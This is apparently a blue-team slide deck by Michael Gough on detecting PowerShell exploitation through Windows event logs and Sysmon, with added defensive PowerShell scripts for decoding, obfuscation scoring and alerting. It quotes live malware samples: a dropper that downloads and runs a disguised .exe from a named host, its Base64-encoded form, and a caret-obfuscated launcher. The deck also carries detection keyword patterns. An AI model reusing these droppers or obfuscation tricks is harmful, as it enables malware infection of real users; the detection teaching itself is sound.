function ieWLdWAwtHiFdfCSOsMbswsef ( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx ){(New-Object System.Net.WebClient).DownloadFile( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx );(New-Object -com Shell.Application).ShellExecute( $sbTfOTtmJsiEYVYx ); }
try{
kill -processname EXCEL;
$HYlZbUWgFvPYig=$env:USERPROFILE+'\KdmObQZVByQpvBSQizp.exe';
ieWLdWAwtHiFdfCSOsMbswsef 'https://comfy.moe/ybnwif.jpg' $HYlZbUWgFvPYig;
}catch{}
• Read top to bottom: kill the Excel that hosted the macro, download a file named .jpg that is really an .exe into the user profile, ShellExecute it, and swallow any error
• Catch it as a PS 4104, not a Process Create 4688
PowerShell Decodes for you !!!
• The 4104 event records the script block text the engine actually compiles, so an -EncodedCommand blob shows up already decoded; you never run the Base64 through anything
• The same goes for strings assembled at runtime and handed to IEX: the assembled text is compiled as a new script block and gets its own 4104
• Module Logging (4103) adds the resolved command name and its bound parameters as each pipeline runs
PS Base 64 blob
POWeRshEll -enCodedCOMmaNd
ZgB1AG4AYwB0AGkAbwBuACAAVgBiAGYASQBqAGEAYwBwAE8AawBwAFIAbABTAEQAc
ABPAFcAeABoAFoAZwAgACgAIAAkAEsAcQBCAGQAQQBUAGoARABMAGsAZQB6AE0AV
wBPAFMAZwAgACwAIAAkAGMATABUAHcARQBvAGYAbQBBAE4AaQBVAHQAYQB4AEQ
AcABSAHAASABHAFoASQBHAEsAWQBGAG0AIAApAHsAKABOAGUAdwAtAE8AYgBqAG
UAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0A
CkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABLAHEAQgBkAEEAVABq
AEQATABrAGUAegBNAFcATwBTAGcAIAAsACAAJABjAEwAVAB3AEUAbwBmAG0AQQBO
AGkAVQB0AGEAeABEAHAAUgBwAEgARwBaAEkARwBLAFkARgBtACAAKQA7ACgATgBlA
HcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAG
kAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAG
MATABUAHcARQBvAGYAbQBBAE4AaQBVAHQAYQB4AEQAcABSAHAASABHAFoASQBHA
EsAWQBGAG0AIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAH
IAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEcAbABOAEQ
AYgBvAGcASgB2AGUAeABNAGIASwBoAGUAPQAkAGUAbgB2ADoAVQBTAEUAUgBQAFI
ATwBGAEkATABFACsAJwBcAHUAYgBQAEQAbgBJAEwAbwBkAHcAWABTAFEAWQBpAFA
AWABlAGMALgBlAHgAZQAnADsADQAKAFYAYgBmAEkAagBhAGMAcABPAGsAcABSAGw
AUwBEAHAATwBXAHgAaABaAGcAIAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbQBmAH
kALgBtAG8AZQAvAHUAdQBvAG8AdgBxAC4AagBwAGcAJwAgACQARwBsAE4ARABiAG8
AZwBKAHYAZQB4AE0AYgBLAGgAZQA7AA0ACgANAAoAfQBjAGEAdABjAGgAewB9AA==
4104 shows the decoded script block
• Suddenly more readable
Obfuscation (Security Log 4688, PowerShell Log 4104, Windows PowerShell Log 400)
Fetch !!!
• They will try to hide or obfuscate their behavior to make it hard to read
• For detection this makes no difference, except that you can't easily understand what they are doing; the noise itself is the signal
• They will add plus “+” to concatenate string fragments
• They will use ticks ` inside words to break keyword matching (the backtick is PowerShell's escape character, so p`o`w`e`r`s`h`e`l`l still runs)
• They will use carets ^ the same way inside cmd.exe (%C^om^S^pEc%)
• They will use dollar $ or percent % to designate variables, and random case (nEW-ObJECT)
• So look for the “Odd Characters” that indicate obfuscation!
– You can thank Daniel Bohannon (Invoke-Obfuscation) for this shtuff
– Or I should say $Daniel #B’o^h^a^n^n^o’n#
Obfuscation – Odd stuff - 4688
• Becomes obvious very quickly.. This is BAD
• Count of characters is very telling once isolated or extracted from the blob
– Ticks ` and plus + are the two that stand out in a 4688 command line
Obfuscation – Odd stuff - 4104
• Now you can't look for words, so adapt
• Lots of special characters, some normal for PS ($ and ; are everywhere in legitimate scripts, so baseline your own scripts before alerting on a count)
Even older PowerShell v2 Event ID 400
• Look for odd characters in the HostApplication field
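The manual translation and the character counting from the slides above, done locally, as an added example that is not code from the slides or from LOG-MD. The encoded sample is constructed from a benign one-liner (so it runs offline); the functions are what you would point at the blob on the slide or at a 4688 CommandLine field. Two details the example makes concrete: -EncodedCommand is Base64 over UTF-16LE text, and the = padding may be missing.

```powershell
# Added example: decode an -EncodedCommand blob and score a command line for the
# obfuscation characters the slides call out. Sample input is constructed.

function ConvertFrom-EncodedCommand {
    # -EncodedCommand is Base64 over the UTF-16LE bytes of the script, not over ASCII.
    param([Parameter(Mandatory)][string]$Base64)
    $clean = $Base64 -replace '\s', ''                  # blobs copied out of logs wrap across lines
    $pad   = (4 - $clean.Length % 4) % 4                # put "=" back if it was stripped
    $bytes = [Convert]::FromBase64String($clean + ('=' * $pad))
    [Text.Encoding]::Unicode.GetString($bytes)          # .NET "Unicode" is UTF-16LE
}

function Get-EncodedBlob {
    # The blob follows any accepted prefix of -EncodedCommand: -e, -ec, -en, -enc, ...
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '\s-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{20,})') { $Matches[1] } else { $null }
}

function Measure-Obfuscation {
    # Counts per character class plus a weighted score. Backtick and caret almost never occur
    # in hand-typed command lines; $ and ; are normal PowerShell, so they are reported but
    # weighted low. Baseline your own scripts before alerting on Score (weights are assumptions).
    param([Parameter(Mandatory)][string]$Text)
    $c = [ordered]@{
        Backtick  = ([regex]::Matches($Text, '`')).Count
        Caret     = ([regex]::Matches($Text, '\^')).Count
        Plus      = ([regex]::Matches($Text, '\+')).Count
        Percent   = ([regex]::Matches($Text, '%')).Count
        Quote     = ([regex]::Matches($Text, '[''"]')).Count
        Dollar    = ([regex]::Matches($Text, '\$')).Count
        Semicolon = ([regex]::Matches($Text, ';')).Count
    }
    $c['TextLength'] = $Text.Length
    $c['Score'] = 3 * $c.Backtick + 3 * $c.Caret + 2 * $c.Plus + 2 * $c.Percent + $c.Quote + [math]::Floor($c.Dollar / 2)
    [pscustomobject]$c
}

# Constructed: a benign one-liner encoded exactly the way a payload is encoded, launched with
# the short switch forms, with the padding stripped to show the decoder copes.
$plain   = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($plain))
$cmdLine = "powershell.exe -NoP -W Hidden -Enc $($encoded.TrimEnd('='))"

$decoded = ConvertFrom-EncodedCommand (Get-EncodedBlob $cmdLine)
if ($decoded -ne $plain) { throw 'decode mismatch' }
"Decoded: $decoded"

# Constructed: the same download written the Invoke-Obfuscation way (cmd carets, ticks, concatenation).
$obfuscated = @'
%C^om^S^pEc% /c p`o`w`e`r`s`h`e`l`l (nEW-ObJECT ('Ne'+'t.Web'+'Client')).DoWnLoAdStRiNg(('ht'+'tp://example.invalid/p'))
'@
Measure-Obfuscation $plain
Measure-Obfuscation $obfuscated
```

The plain one-liner scores on nothing but its two quotes; the obfuscated form of the same download scores on nine backticks, three carets, three plus signs and two percent signs before a single keyword is matched, which is the point of the slide: count the characters, not the words.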
4104 - PowerShell Script Block Logging
Microsoft-Windows-PowerShell/Operational Log
• Script Blocks are labeled: each 4104 carries a ScriptBlockId, the Path of the script file (empty for -Command, -EncodedCommand and interactive input), and a “MessageNumber of MessageTotal” counter, because a large block is split across several 4104 events that share one ScriptBlockId
Then you will see this in the logs
• It is not translated, just recorded
• But they are LARGE
– You can trigger on say > 1000 characters
– You can see this one will also trigger Obfuscation
This is a normal Script Block
Do they look the same?
• A normal block is readable; the obfuscated one is NOT readable, and they obfuscate with ticks ` and plus + all through it
4103 - PowerShell Module Logging, and the 4104 WARNING events
Microsoft-Windows-PowerShell/Operational Log
WARNING !!!!
• PowerShell does have a WARNING if something violates a rule or is odd
– PowerShell v5 carries a built-in list of suspicious strings (Add-Type, DllImport, VirtualAlloc, GetProcAddress, FromBase64String and EncodedCommand among them); a script block containing one is logged as a 4104 at Level = Warning, and that happens even when Script Block Logging has not been enabled by policy
• Trigger Alerts on these too
• 4104, Task Category “Execute a Remote Command”, Level Warning, along with all this… = BAD
• Just look.. It’s NOT normal
• And the raw log carries the same block text
• And you can see translation in Event ID 4100
4100 – Executing Pipeline
• 4100 is written when a command in the pipeline fails; its error text quotes the resolved command, so some translation of the obfuscated code occurs there (the resolved text is readable, the original is NOT)
PS v2 - 500 Events
• Windows PowerShell (Command Lifecycle; the Base64 in this one ends in two =)
PS v2 - 200 Events
• Command Health
Whitelisting PowerShell In the Logs
Filtering out the good, to find the bad
• PLEASE put a Mark/Sign/Secret Key in your scripts
Code your PowerShell for exclusion
• Make the scripts excludable on obvious things YOU or your company does or knows
• The path is awesome
– All scripts excluded by path alone (the Path field of 4104, and -File <path> in 4688)
– Only if the path is locked down: an attacker who can write to it inherits the exclusion
• Names, Secret Code, Key
– Have your scripts contain something only you know that is a ‘secret key’ to exclude by
– It is only secret until someone reads your scripts or your logs, so rotate it and treat it as a triage filter, not as proof of trust
• Or.. Sign your PS scripts
– Get-AuthenticodeSignature on the Path is the one check an attacker cannot copy-paste
Once you create these queries
Create Email Alerts
• Trigger on PS launching
• Tweak and filter out known good
– Get your developers to mark their code!!
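Triage of 4104 events the way the WARNING, size and whitelisting slides describe, as an added example that is not code from the slides or from LOG-MD: alert on PowerShell's own Warning-level blocks, on oversized blocks, on obfuscation characters and download/decode words, after excluding your own scripts by Authenticode signature, by a marker string, or by path. The trusted path, the marker and the 1000-character threshold are assumptions, and the sample blocks are constructed; Get-ScriptBlock4104 maps live events into the same shape.

```powershell
# Added example: 4104 triage with whitelisting. Sample blocks are constructed.
$TrustedScriptRoot = 'C:\Corp\Scripts\'   # assumption: write access limited to your deployment account
$TrustedMarker     = '#CORP-SIG-7f3a'      # assumption: a token only your scripts carry; rotate it
$SizeThreshold     = 1000                  # the slide's "> 1000 characters"

function Get-ScriptBlock4104 {
    # 4104 properties, in order: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path.
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
                                     StartTime = (Get-Date).AddHours(-$Hours) } |
        ForEach-Object {
            [pscustomobject]@{
                Time  = $_.TimeCreated
                Level = $_.LevelDisplayName               # 'Warning' = PowerShell flagged it itself
                Text  = [string]$_.Properties[2].Value
                Id    = [string]$_.Properties[3].Value
                Path  = [string]$_.Properties[4].Value    # empty for -Command, -EncodedCommand, interactive
            }
        }
}

function Test-TrustedScript {
    # Returns why the block is trusted, or $null. Signature is checked first: a marker can be
    # copied by anyone who reads your scripts or logs, and a path exclusion is inherited by
    # anyone who can write there, so those two are triage filters, not proof.
    param($Block)
    if ($Block.Path -and (Test-Path -LiteralPath $Block.Path)) {
        $sig = Get-AuthenticodeSignature -FilePath $Block.Path
        if ($sig.Status -eq 'Valid') { return "signed: $($sig.SignerCertificate.Subject)" }
    }
    if ($Block.Text -and $Block.Text.Contains($TrustedMarker)) { return 'marker' }
    if ($Block.Path -and $Block.Path -like "$TrustedScriptRoot*") { return 'trusted path' }
    return $null
}

function Test-ScriptBlock {
    param($Block)
    $why = New-Object System.Collections.Generic.List[string]
    if ($Block.Level -eq 'Warning')            { $why.Add('PowerShell WARNING') }
    if ($Block.Text.Length -gt $SizeThreshold) { $why.Add("size $($Block.Text.Length)") }
    $odd = ([regex]::Matches($Block.Text, '[`^+%]')).Count
    if ($odd -gt 10)                           { $why.Add("odd chars $odd") }   # threshold is an assumption
    if ($Block.Text -match 'Net\.WebClient|Download(?:String|File|Data)|FromBase64String|Invoke-Expression|\biex\b') {
        $why.Add('download/decode')
    }
    $trusted = Test-TrustedScript $Block
    [pscustomobject]@{
        Time    = $Block.Time
        Alert   = (-not $trusted) -and ($why.Count -gt 0)
        Trusted = $trusted
        Reasons = $why -join ', '
        Path    = $Block.Path
    }
}

# Constructed sample blocks, in the shape Get-ScriptBlock4104 returns.
$Samples = @(
    [pscustomobject]@{ Time = Get-Date; Level = 'Verbose'; Id = 'b1'; Path = 'C:\Corp\Scripts\HealthCheck.ps1'
                       Text = "#CORP-SIG-7f3a`nGet-Service | Where-Object Status -eq 'Running'" }
    [pscustomobject]@{ Time = Get-Date; Level = 'Warning'; Id = 'b2'; Path = ''
                       Text = 'IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)))' }
    [pscustomobject]@{ Time = Get-Date; Level = 'Verbose'; Id = 'b3'; Path = ''
                       Text = '$u=' + ('"h"+' * 400) + '"x";(New-Object Net.WebClient).DownloadString($u)' }
)
$Samples | ForEach-Object { Test-ScriptBlock $_ } | Format-Table Alert, Trusted, Reasons, Path -AutoSize

# Live: Get-ScriptBlock4104 | ForEach-Object { Test-ScriptBlock $_ } | Where-Object Alert
#       then hand the results to Send-MailMessage or your SIEM forwarder.
```

The marked health-check script is excluded, the FromBase64String block is an alert because PowerShell itself rated it Warning, and the 400-fragment concatenation trips both the size and the odd-character rules before its download call is even looked at. Trusted is reported next to Alert on purpose: suppress the row in the alert feed, but keep the event, because the exclusion is what an attacker who has read your scripts will try to hide behind.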
PowerShell Log Goodness
• Enable the logs per the Cheat Sheets
• PS v2 Logs (even if you have PS v5)
– Collect Event ID 200, 400, 500 and 800
– Windows PowerShell
• PS v5 Logs
– Collect 4100, 4103 and 4104
– Microsoft-Windows-PowerShell/Operational
• Windows Logs
– Collect 4688 – WITH Process Command Line
Security Log
Event ID - 4688
• PS executed
• PS Bypass executed
• PS Suspicious buzzwords
• PS Count Obfuscation Characters (` + $ % ;)
– There are others & # ^, etc. Tweak as needed
• You can look for large Script Blocks and Base64, but use the PS logs for this
PowerShell v2
• 200 – Command Health – WARNING, will give you some translation
• 400 – Engine Lifecycle – What executed; HostApplication holds the full powershell.exe command line
• 500 – Command Lifecycle - What executed and the command line if using profile.ps1
– and only if “No Profile” (-NoP) was not used to bypass it
PowerShell v2
Event IDs - 200 and/or 400
• PS Web Call
• PS Count Obfuscation Chars (` + $ % ;)
• PS ScriptBlock size (> 1000)
• PS Base64 blocks
• PS WARNINGS
PowerShell v5
PowerShell/Operational Log
• 4100 – Executing Pipeline – WARNING (a command failed; the error text carries the resolved command)
• 4103 – Executing Pipeline – Module Logging (the command that ran and its bound parameters)
• 4104 – Execute a Remote Command – WARNING for blocks on PowerShell's suspicious list, Verbose for the rest
• Obfuscation is not so much stripped out as unwound: the obfuscated block is logged, and whatever it builds and hands to IEX is compiled as a new block and logged too, so you get the clean code as well
• That big Base64 blob… now it is readable
PowerShell v5
Event IDs - 4100 and/or 4104
• PS Web Call
• PS Suspicious Commands (buzzwords)
• PS Count Obfuscation Chars (` + $ % ;)
• PS ScriptBlock by size (> 1000)
• PS Base64 blocks
• PS WARNINGS
PowerShell v5
Windows PowerShell Log
• 800 – Pipeline Execution Details – What executed (needs Module Logging on)
– Focus on the HostApplication field
Sysmon
• You can catch Not-PowerShell PowerShell execution (the engine hosted in some other .exe, or a renamed powershell.exe)
• Event ID 7 – Image loads
– Look for any process other than powershell.exe / powershell_ise.exe that loads System.Management.Automation.dll or its pre-compiled System.Management.Automation.ni.dll
– Sysmon only records image loads when your config asks for them
• And all the other cool stuff Sysmon collects
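The Sysmon event 7 check, as an added example that is not code from the slides or from LOG-MD: whatever a host process is called, running PowerShell means loading System.Management.Automation.dll (or its .ni.dll twin), so the query flags any image outside an expected-host list that loads it. The host list and the sample loads are assumptions/constructed; Get-SysmonImageLoads reads live events by field name, so it is not tied to one Sysmon version's property order.

```powershell
# Added example: "Not-PowerShell PowerShell" via Sysmon event 7 (image load). Samples are constructed.
$ExpectedHosts = @(
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe'
    'C:\Program Files\PowerShell\7\pwsh.exe'
    # assumption: add management agents that legitimately host the engine once you have baselined
)
$EngineDll = '\\System\.Management\.Automation(?:\.ni)?\.dll$'

function Test-UnexpectedPSHost {
    # $true when a process outside the expected list loaded the PowerShell engine.
    param([string]$Image, [string]$ImageLoaded)
    ($ImageLoaded -match $EngineDll) -and ($Image -notin $ExpectedHosts)
}

function Get-SysmonImageLoads {
    # Sysmon writes event 7 only when the config contains ImageLoad rules (it is off by default).
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7
                                     StartTime = (Get-Date).AddHours(-$Hours) } |
        ForEach-Object {
            $x = [xml]$_.ToXml(); $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{ Time = $_.TimeCreated; Image = $d.Image; ImageLoaded = $d.ImageLoaded
                               Signed = $d.Signed; Signature = $d.Signature }
        }
}

function Find-UnexpectedPSHosts {
    param([Parameter(ValueFromPipeline)]$Load)
    process { if (Test-UnexpectedPSHost $Load.Image $Load.ImageLoaded) { $Load } }
}

# Constructed sample loads, in the shape Get-SysmonImageLoads returns.
$gac = 'C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll'
$Loads = @(
    [pscustomobject]@{ Time = Get-Date; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ImageLoaded = $gac }
    [pscustomobject]@{ Time = Get-Date; Image = 'C:\Users\Public\svchost.exe';                              ImageLoaded = $gac }   # engine in an unexpected host
    [pscustomobject]@{ Time = Get-Date; Image = 'C:\Windows\System32\notepad.exe';                          ImageLoaded = 'C:\Windows\System32\user32.dll' }
)
$Loads | Find-UnexpectedPSHosts | Format-Table Image, ImageLoaded -AutoSize

# Live: Get-SysmonImageLoads | Find-UnexpectedPSHosts
```

Only the svchost.exe living in C:\Users\Public comes back: it loaded the engine and is not on the list. The real powershell.exe loading the same DLL and notepad.exe loading user32.dll are both ignored, which keeps the rule quiet enough to alert on directly; the first week of output is your baseline of legitimate hosts to add to the list.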
How do I hunt for PS?
• Log Management obviously
• What if you do not have fancy Log Management?
• Without Log Management? Run the checks on the host itself (see LOG-MD in the Summary)
Summary
• LOG-MD will check your system and report
• Upgrade to PS v5 – NOW!
• Enable PowerShell logging!
• Use the “Windows PowerShell Logging Cheat Sheet” for what to set
• Create Reports and Alerts for the items discussed
• Maybe add Sysmon on a few systems
• Use the “Windows Splunk and Humio Logging Cheat Sheets” for examples of what was discussed
• Send us your improvements and tweaks!!!!
• But START LOGGING POWERSHELL!!!!
Resources
LOG-MD.COM
• Websites
– Log-MD.com The tool
• The “Windows PowerShell Logging Cheat
Sheet(s)”
– MalwareArchaeology.com
Resources
• https://www.invincea.com/2017/03/powershell-exploit-analyzed-line-by-line/
List of Tools
• https://github.com/emilyanncr/Windows-Post-Exploitation
Obfuscation
• http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide
• http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide-part-2
• https://github.com/danielbohannon/Revoke-Obfuscation
• https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf
• https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
Metasploit Check Logging module
• https://github.com/darkoperator/Meterpreter-Scripts/tree/master/scripts
Questions?
LOG-MD.COM
You can find us at:
• Log-MD.com
• @HackerHurricane
• HackerHurricane.com (blog)
• MalwareArchaeology.com – Cheat Sheets
• Listen to the “Brakeing Down Incident Response”
Podcast
– BDIRPodcast.com

You can detect PowerShell attacks

  • 1.
    PowerShell post-exploitation, the Empirehas fallen, You CAN detect PowerShell exploitation Michael Gough MalwareArchaeology.com MalwareArchaeology.com
  • 2.
    Who am I •Blue Team Defender Ninja, Malware Archaeologist, Logoholic • I love “properly” configured logs – they tell us Who, What, Where, When and hopefully How Creator of “Windows Logging Cheat Sheet”, “Windows File Auditing Cheat Sheet” “Windows Registry Auditing Cheat Sheet”, “Windows Splunk Logging Cheat Sheet” “Windows PowerShell Logging Cheat Sheet”, “Malware Management Framework” NEW - “Windows HUMIO Logging Cheat Sheet” • Co-Creator of “Log-MD” – Log Malicious Discovery Tool – With @Boettcherpwned – Brakeing Down Security PodCast • Co-host of “Brakeing Down Incident Response” podcast • @HackerHurricane also my Blog MalwareArchaeology.com
  • 3.
  • 4.
    PowerShell Exploitation • Malwareloves to use PowerShell to download and launch payloads – They try and hide it too • Red Teamers love PowerShell – They love to hide too – It is already built into the OS • But they DO make noise and CAN be detected – If you know how MalwareArchaeology.com
  • 5.
    So where dowe start? MalwareArchaeology.com
  • 6.
  • 7.
    What is set?What version? • What version PowerShell you running? • Is logging enabled? • Are you using a PS v2 profile.ps1 to set logging? • What is your Execution Policy? • How can you check? MalwareArchaeology.com
  • 8.
  • 9.
    Audit with LOG-MD •We give you a report MalwareArchaeology.com
  • 10.
  • 11.
    PowerShell has Logs! •You MUST enable them, not configured by default ;-( • “Windows Logging Cheat Sheet” (CMD LINE) • “Windows PowerShell Logging Cheat Sheet” – Follow the guidance – MalwareArchaeology.com/cheat-sheets • Module Logging • ScriptBlock Logging • Pipeline Execution Logging • Transcripts if you want • Profile.ps1 for PS v2 – nop (no Profile) will bypass this ;-( MalwareArchaeology.com
  • 12.
    PS Event IDs– Windows PowerShell MalwareArchaeology.com www.eventsentry.com/blog/2018/01/powershell-p0wrh11-securing-powershell.html
  • 13.
    PS Event IDs– PowerShell/Operational • 4105 and 4106 too, but WAY too noisy to be of any value MalwareArchaeology.com www.eventsentry.com/blog/2018/01/powershell-p0wrh11-securing-powershell.html
  • 14.
  • 15.
    What is MalwareUsing? • LOTS of PowerShell – In most malware we see – Hearing it a lot in targeted attacks – Living off the land, all the files are already there – Just add script/commands and run • PenTesters, The RED TEAM also loves them • There are LOTS of PS post-exploit kits MalwareArchaeology.com
  • 16.
    Exploit Kits • PowerSploit •PowerShellEmpire • EmpireProject • BloodHound • PSRecon • PowerShell-Suite • PowerTools • Powershell-C2 • And more… MalwareArchaeology.com
  • 17.
    BLUE TEAM Baby DETECTION! MalwareArchaeology.com
  • 18.
    4688 - ProcessCreate Security Log MalwareArchaeology.com
  • 19.
    Typical Malware launchingPowerShell 1. User launches MS Word 1. Calls CMD.exe 1. Calls PowerShell and downloads dropper 1. Calls Malware 1. Calls 2nd copy of Malware MalwareArchaeology.com
  • 20.
    This PowerShell looksodd • cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set %var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. ( '76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAUQB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1ADMAMQBiADkAMQAzADUAYwBiAD EAZAA2ADMAMgA5AGIANABhADQAZQA1ADUAZgA1ADMAZQA4ADYAZQBiADgAYQAyAGUAZgA3ADYANABkAGUANQBjADMAMQA3AGQAZgA5ADcAZABjAGUANwA4AGMAZAA4AD kAOAA0ADAAOQA4ADgANAA2AGUAYgA0ADAAMQA3ADUAYgA5AGMANwAwAGEANgA3ADIANQAyADEANgBmADQAZQA3ADcAZgA4ADMAMABkAGMAOABhAGQAOQA2AGIAZQAx AGMAZQBhADYAMwAxAGUAMQAzAGEANQA0ADgAYwBmADMAMQA1ADgANAAyADEAOABiAGQAOABjADAAOAAzAGUAOQA3ADIAYwA4AGIAZgBhADAAMQA1ADkAYQBjAGMAN ABlAGUAMABlAGUAMQBjADcAZQBhADMAZQBlAGEAMQBlADkANABkADYAOAAzAGEAYQA3ADcAMQBiADQAYwA5AGUANgBkAGMAYQBmADkANAA5ADYAMgBiADYAYwBkADMA OQA3ADEAZgA1AGYAYwBjADAAZQBiAGQAOAAzADQAOAA4AGMAZQA3AGMAZABjAGIAYQBiAGYAZAA4ADgAOQBiADgAOAAyADcANwAwADcANAA0ADIAZAAyADMAZQAwADMAO QBlADUANQA1ADUAMQBiADUAZgAxADgAOAA1ADcANgA5ADMANABkADkANAAzADUANwAzADgAOQA3ADAAMABiAGUAMwBiAGYAMwA1ADEAMQBiAGEANgBiADYAYgAwADUA NQAxAGUANAA3ADUAMgBjAGUANAA4ADgAYQBiADYAMQA3ADUAOQBkADEAZQA1ADUANAA3ADUANwA2ADYAOABlADgANwBmAGMAMQAzADQANwBmAGEANgA4AGUAMwA0 ADAANwBmADAANQBiADkANwAyAGEANAA3ADIAZAA3AGIAMgAxADYAYwBmADAAMwA0ADYAYwA2ADYAYgAxADkAMQA3AGUAYgA0ADkAOABiADUANgAyADgAMQBmADQAYgA 2ADYAMQAyAGMAOQAxAGEAOQA5AGEANQBiADcAYgBhAGQAYgA1ADgAZQBiAGMAZgA4AGEAMQA2ADAANgAzADkAMwBjAGIAMgA4ADcANwA3ADIANAAxADcANgAwADEAZQA2 AGQAMwBiAGYAMgBhADEAMQAxADMAYQAyAGUAOQBmADIAYgA4AGUAZQA0ADUAMwBmAGYAYwAzAGIAMABiAGMAYwAyADYANQBmADcAMgAzAGUAYgBmAGQAYgA1ADQA 
OAAwADEANAA3ADcAZgAyAGQAZAA4AGUAYgBhAGYAOQA1ADMAMgA5AGEANgA2ADQANwAwAGUANwAzADMAZQBlADgAMgBjAGEAYwAzAGQAOQBhADQAYQA4ADAAMgAwA GQAOABkAGMANwAxADAANQA5ADEAYwBkAGIAYgA4ADMANgAwADYAZQBkAGYAMAA4ADgAMwBmADUANABhAGYAOABmADgANQAyADAAMQA4ADYAYwAxADMAMQBiADkAZ gA4AGIAZQAzADQAZgA5AGYAMQBkADcAOQA4AGIAZgAxADcAOAAxADMAOAA5ADEANQAxAGQAYQBjADIAYwAxADcAMAAwADEANwAzADgAMQA4ADgAMgA0ADMAMwBmADMA ZQBkADUAMAA4ADYAYQBiADIAYgAxAGEAYgA3ADMAMAAxADAAMABhADIAYwA1AGYAZgA0ADkAYgBiADkANwBjAGMANwBkADgAMQAzADUAMAAxADAAZQBmAGEAMQAyADQA OQBhAGMAMQBkAGYAZgBjAGEAZgBiADYAMAA2ADUAOABhAGYANwAzADEAOQAzADEAZQBhADUANwA4AGMAYQBmADEANwAxADEAOAA1ADgANgA0ADkANABjADYAMABkAGU AYgA2AGUAMQBlAGIAMgA5ADkAYQAwADAANgA1ADAANgAxADYANgBkADUAYwA2AGIAYgAyAGYAMAA0ADYAYgBlADAANwA1AGQAOQAxADcAOABmAGMAOAA2ADEAMQA4ADc AMAA3ADcAYwA0AGUAYgA2AGIAOQAyADMAYgBhADgAMQBlADAAOQA3ADgANgBkAGIAYwA4ADEAMgA2ADQAZgA5AGMAOQAwAGYAZAAwADQAYQBkAGUAOAA1ADkAZQBlAD UANwA2ADgANAA4ADkANQBiADgAMgAzADMAMgAwAGUAYgA1ADMANQBiAGUANAA5AGMAYgA4ADAAYQA4AGQANABiAGEAMwA1ADQAMwBhADAAMQA3AGYAYwAwADMAY wA3ADEAYwAyADQAZQBlAGMAOQBmADkAMgA0AGMAYQAyAGMANgA2AGQAOABlADQAOAA5ADUAMwBjADQAZABkADIAZQA2ADQAYQAzADgANAAxADcAOABmAGMAMABhAG QANgAyADIANwA4ADQAYQA2AGYANABiADgAMQA4ADcAYgAwADgAZABmADgAMQA0AGMAYwBhADcAYgBlAGEAOQAyADcAMgBiADcAOAAxADkAMQBiADcAZAAwADUANgA0AG QAMwAzAGYAMQBjADgAOQBiAGUAZQA3ADgAZAAxAGIANwA1AGMAMQA2ADIAOQAyADMAMAA3ADcAZgA4ADEAZAAyADQAZABkAGUANwBlAGYANAA1ADAANABkADUAMgAxA DEANgAxADgAZQBjAGUAMwBlADUAMQAyADgANABlADEANwA4ADYAZABlADIAMgA5ADAAYgAwADYANAA2ADAAZQA2ADIAMQBlADQAYwA5ADAAZAA0ADgAOAA4ADgANgA5ADc ANAA2ADMAYwBjADIAOABlADYAYwBiADYAMwA2AGUAMAAxADEAZgA2AGMAYgAzAGUANwBjADIAMABmADcANgAwADgAMgA4AGYAZAA5ADgAOQBjADMAZgBiAGUAYgA4ADkA MQA4AGIANwA2ADYAYgBhAGMAMQA4ADUAMAAwADMAMQAyADEAYQA2ADUAMQBhADQANABlADAAMQA5AGYAZQAxADcAZgBjADIANQBjADgANgA3ADUAOQA0ADIANwA4AD cAYgA1ADUAYgA0ADAANAA0ADkAMgBhAGMAZQBmAGEAZAAwAGEAZQBjAGIAMQBkAGEAMwAzADEAMABlADMAOQAyADAAZABkADMAMQA1ADQAMgA4ADEAMABlADQAZgAx 
